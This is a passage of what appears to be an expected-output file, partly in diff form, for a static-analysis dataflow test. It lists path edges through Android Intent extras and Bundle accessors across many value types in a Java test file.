: String | Test.java:246:9:246:40 | getMapKey(...) | | Test.java:246:36:246:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:246:19:246:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:246:36:246:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:246:19:246:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:253:38:253:40 | out : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : ArrayList | Test.java:253:21:253:41 | getIntent_extras(...) : Bundle [] : ArrayList | | Test.java:253:38:253:40 | out : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : ArrayList | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : ArrayList | Test.java:253:21:253:41 | getIntent_extras(...) : Bundle [] : ArrayList | | Test.java:428:19:428:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:428:9:428:40 | getMapKey(...) | | Test.java:428:36:428:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:428:19:428:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:428:36:428:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) 
: Bundle [] : String | Test.java:428:19:428:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:435:19:435:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:435:9:435:40 | getMapKey(...) | | Test.java:435:36:435:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:435:19:435:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:435:36:435:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:435:19:435:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:442:19:442:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:442:9:442:40 | getMapKey(...) | | Test.java:442:36:442:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:442:19:442:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:442:36:442:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:442:19:442:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:449:19:449:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:449:9:449:40 | getMapKey(...) 
| | Test.java:449:36:449:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:449:19:449:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:449:36:449:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:449:19:449:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:456:19:456:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:456:9:456:40 | getMapKey(...) | | Test.java:456:36:456:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:456:19:456:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:456:36:456:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:456:19:456:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:463:19:463:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:463:9:463:40 | getMapKey(...) | | Test.java:463:36:463:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:463:19:463:39 | getIntent_extras(...) 
: Bundle [] : String | -| Test.java:463:36:463:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:463:19:463:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:470:19:470:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:470:9:470:40 | getMapKey(...) | | Test.java:470:36:470:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:470:19:470:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:470:36:470:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:470:19:470:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:477:19:477:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:477:9:477:40 | getMapKey(...) | | Test.java:477:36:477:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:477:19:477:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:477:36:477:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:477:19:477:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:484:19:484:39 | getIntent_extras(...) 
: Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:484:9:484:40 | getMapKey(...) | | Test.java:484:36:484:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:484:19:484:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:484:36:484:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:484:19:484:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:491:19:491:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:491:9:491:40 | getMapKey(...) | | Test.java:491:36:491:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:491:19:491:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:491:36:491:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:491:19:491:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:498:19:498:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:498:9:498:40 | getMapKey(...) | | Test.java:498:36:498:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) 
: Bundle [] : String | Test.java:498:19:498:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:498:36:498:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:498:19:498:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:505:19:505:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:505:9:505:40 | getMapKey(...) | | Test.java:505:36:505:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:505:19:505:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:505:36:505:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:505:19:505:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:512:19:512:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:512:9:512:40 | getMapKey(...) | | Test.java:512:36:512:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:512:19:512:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:512:36:512:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:512:19:512:39 | getIntent_extras(...) 
: Bundle [] : String | | Test.java:519:19:519:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:519:9:519:40 | getMapKey(...) | | Test.java:519:36:519:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:519:19:519:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:519:36:519:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:519:19:519:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:526:19:526:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:526:9:526:40 | getMapKey(...) | | Test.java:526:36:526:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:526:19:526:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:526:36:526:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:526:19:526:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:533:19:533:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:533:9:533:40 | getMapKey(...) 
| | Test.java:533:36:533:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:533:19:533:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:533:36:533:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:533:19:533:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:540:19:540:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:540:9:540:40 | getMapKey(...) | | Test.java:540:36:540:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:540:19:540:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:540:36:540:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:540:19:540:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:547:19:547:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:547:9:547:40 | getMapKey(...) | | Test.java:547:36:547:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:547:19:547:39 | getIntent_extras(...) 
: Bundle [] : String | -| Test.java:547:36:547:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:547:19:547:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:554:19:554:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:554:9:554:40 | getMapKey(...) | | Test.java:554:36:554:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:554:19:554:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:554:36:554:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:554:19:554:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:561:19:561:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:561:9:561:40 | getMapKey(...) | | Test.java:561:36:561:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:561:19:561:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:561:36:561:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:561:19:561:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:568:19:568:39 | getIntent_extras(...) 
: Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:568:9:568:40 | getMapKey(...) | | Test.java:568:36:568:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:568:19:568:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:568:36:568:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:568:19:568:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:575:19:575:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:575:9:575:40 | getMapKey(...) | | Test.java:575:36:575:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:575:19:575:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:575:36:575:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:575:19:575:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:582:19:582:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:582:9:582:40 | getMapKey(...) | | Test.java:582:36:582:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) 
: Bundle [] : String | Test.java:582:19:582:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:582:36:582:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:582:19:582:39 | getIntent_extras(...) : Bundle [] : String | | Test.java:589:19:589:39 | getIntent_extras(...) : Bundle [] : String | Test.java:24:19:24:30 | b : Bundle [] : String | Test.java:24:42:24:69 | next(...) : String | Test.java:589:9:589:40 | getMapKey(...) | | Test.java:589:36:589:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:589:19:589:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:589:36:589:38 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:589:19:589:39 | getIntent_extras(...) : Bundle [] : String | -| Test.java:596:38:596:40 | out : Intent [android.content.Intent.extras, ] : short[] | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : short[] | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : short[] | Test.java:596:21:596:41 | getIntent_extras(...) : Bundle [] : short[] | | Test.java:596:38:596:40 | out : Intent [android.content.Intent.extras, ] : short[] | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : short[] | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : short[] | Test.java:596:21:596:41 | getIntent_extras(...) 
: Bundle [] : short[] | | Test.java:603:38:603:40 | out : Intent [android.content.Intent.extras, ] : Number | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Number | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Number | Test.java:603:21:603:41 | getIntent_extras(...) : Bundle [] : Number | -| Test.java:603:38:603:40 | out : Intent [android.content.Intent.extras, ] : Number | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Number | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Number | Test.java:603:21:603:41 | getIntent_extras(...) : Bundle [] : Number | -| Test.java:610:38:610:40 | out : Intent [android.content.Intent.extras, ] : long[] | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : long[] | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : long[] | Test.java:610:21:610:41 | getIntent_extras(...) : Bundle [] : long[] | | Test.java:610:38:610:40 | out : Intent [android.content.Intent.extras, ] : long[] | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : long[] | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : long[] | Test.java:610:21:610:41 | getIntent_extras(...) : Bundle [] : long[] | | Test.java:617:38:617:40 | out : Intent [android.content.Intent.extras, ] : Number | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Number | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Number | Test.java:617:21:617:41 | getIntent_extras(...) : Bundle [] : Number | -| Test.java:617:38:617:40 | out : Intent [android.content.Intent.extras, ] : Number | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Number | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Number | Test.java:617:21:617:41 | getIntent_extras(...) 
: Bundle [] : Number | -| Test.java:624:38:624:40 | out : Intent [android.content.Intent.extras, ] : int[] | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : int[] | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : int[] | Test.java:624:21:624:41 | getIntent_extras(...) : Bundle [] : int[] | | Test.java:624:38:624:40 | out : Intent [android.content.Intent.extras, ] : int[] | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : int[] | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : int[] | Test.java:624:21:624:41 | getIntent_extras(...) : Bundle [] : int[] | | Test.java:631:38:631:40 | out : Intent [android.content.Intent.extras, ] : Number | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Number | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Number | Test.java:631:21:631:41 | getIntent_extras(...) : Bundle [] : Number | -| Test.java:631:38:631:40 | out : Intent [android.content.Intent.extras, ] : Number | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Number | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Number | Test.java:631:21:631:41 | getIntent_extras(...) : Bundle [] : Number | -| Test.java:638:38:638:40 | out : Intent [android.content.Intent.extras, ] : float[] | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : float[] | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : float[] | Test.java:638:21:638:41 | getIntent_extras(...) : Bundle [] : float[] | | Test.java:638:38:638:40 | out : Intent [android.content.Intent.extras, ] : float[] | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : float[] | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : float[] | Test.java:638:21:638:41 | getIntent_extras(...) 
: Bundle [] : float[] | | Test.java:645:38:645:40 | out : Intent [android.content.Intent.extras, ] : Number | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Number | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Number | Test.java:645:21:645:41 | getIntent_extras(...) : Bundle [] : Number | -| Test.java:645:38:645:40 | out : Intent [android.content.Intent.extras, ] : Number | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Number | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Number | Test.java:645:21:645:41 | getIntent_extras(...) : Bundle [] : Number | -| Test.java:652:38:652:40 | out : Intent [android.content.Intent.extras, ] : double[] | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : double[] | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : double[] | Test.java:652:21:652:41 | getIntent_extras(...) : Bundle [] : double[] | | Test.java:652:38:652:40 | out : Intent [android.content.Intent.extras, ] : double[] | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : double[] | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : double[] | Test.java:652:21:652:41 | getIntent_extras(...) : Bundle [] : double[] | | Test.java:659:38:659:40 | out : Intent [android.content.Intent.extras, ] : Number | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Number | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Number | Test.java:659:21:659:41 | getIntent_extras(...) : Bundle [] : Number | -| Test.java:659:38:659:40 | out : Intent [android.content.Intent.extras, ] : Number | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Number | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Number | Test.java:659:21:659:41 | getIntent_extras(...) 
: Bundle [] : Number | -| Test.java:666:38:666:40 | out : Intent [android.content.Intent.extras, ] : char[] | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : char[] | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : char[] | Test.java:666:21:666:41 | getIntent_extras(...) : Bundle [] : char[] | | Test.java:666:38:666:40 | out : Intent [android.content.Intent.extras, ] : char[] | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : char[] | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : char[] | Test.java:666:21:666:41 | getIntent_extras(...) : Bundle [] : char[] | | Test.java:673:38:673:40 | out : Intent [android.content.Intent.extras, ] : Number | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Number | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Number | Test.java:673:21:673:41 | getIntent_extras(...) : Bundle [] : Number | -| Test.java:673:38:673:40 | out : Intent [android.content.Intent.extras, ] : Number | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Number | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Number | Test.java:673:21:673:41 | getIntent_extras(...) : Bundle [] : Number | -| Test.java:680:38:680:40 | out : Intent [android.content.Intent.extras, ] : byte[] | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : byte[] | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : byte[] | Test.java:680:21:680:41 | getIntent_extras(...) : Bundle [] : byte[] | | Test.java:680:38:680:40 | out : Intent [android.content.Intent.extras, ] : byte[] | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : byte[] | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : byte[] | Test.java:680:21:680:41 | getIntent_extras(...) 
: Bundle [] : byte[] | | Test.java:687:38:687:40 | out : Intent [android.content.Intent.extras, ] : Number | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Number | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Number | Test.java:687:21:687:41 | getIntent_extras(...) : Bundle [] : Number | -| Test.java:687:38:687:40 | out : Intent [android.content.Intent.extras, ] : Number | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Number | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Number | Test.java:687:21:687:41 | getIntent_extras(...) : Bundle [] : Number | -| Test.java:694:38:694:40 | out : Intent [android.content.Intent.extras, ] : boolean[] | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : boolean[] | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : boolean[] | Test.java:694:21:694:41 | getIntent_extras(...) : Bundle [] : boolean[] | | Test.java:694:38:694:40 | out : Intent [android.content.Intent.extras, ] : boolean[] | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : boolean[] | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : boolean[] | Test.java:694:21:694:41 | getIntent_extras(...) : Bundle [] : boolean[] | | Test.java:701:38:701:40 | out : Intent [android.content.Intent.extras, ] : Boolean | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Boolean | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Boolean | Test.java:701:21:701:41 | getIntent_extras(...) : Bundle [] : Boolean | -| Test.java:701:38:701:40 | out : Intent [android.content.Intent.extras, ] : Boolean | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Boolean | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Boolean | Test.java:701:21:701:41 | getIntent_extras(...) 
: Bundle [] : Boolean | -| Test.java:708:38:708:40 | out : Intent [android.content.Intent.extras, ] : String[] | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String[] | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String[] | Test.java:708:21:708:41 | getIntent_extras(...) : Bundle [] : String[] | | Test.java:708:38:708:40 | out : Intent [android.content.Intent.extras, ] : String[] | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String[] | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String[] | Test.java:708:21:708:41 | getIntent_extras(...) : Bundle [] : String[] | | Test.java:715:38:715:40 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | Test.java:715:21:715:41 | getIntent_extras(...) : Bundle [] : String | -| Test.java:715:38:715:40 | out : Intent [android.content.Intent.extras, ] : String | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | 